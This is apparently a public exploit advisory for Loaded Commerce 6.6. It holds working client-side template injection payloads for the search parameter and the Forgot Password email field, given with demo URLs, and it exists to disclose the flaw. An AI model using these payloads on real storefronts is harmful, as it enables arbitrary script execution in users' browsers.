# Exploit Title: Loaded Commerce 6.6 Client-Side Template Injection(CSTI)
# Date: 03/13/2025
# Exploit Author: tmrswrr
# Vendor Homepage: https://loadedcommerce.com/
# Version: 6.6
# Tested on: https://www.softaculous.com/apps/ecommerce/Loaded_Commerce
Injecting {{7*7}} into the search parameter
https://demos1.softaculous.com/Loaded_Commerce/index.php?rt=core%2Fadvanced_search_result&keywords={{7*7}}
returns 49, confirming a template injection vulnerability.
Forgot Password:
Submitting {{constructor.constructor('alert(1)')()}} in the email field on the "Forgot Password" page
https://demos1.softaculous.com/Loaded_Commerce/index.php?rt=core/password_forgotten&action=process
triggers an alert, demonstrating client-side code execution.Credits and Partners
All rights reserved nPulse.net 2009 - 2025
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD
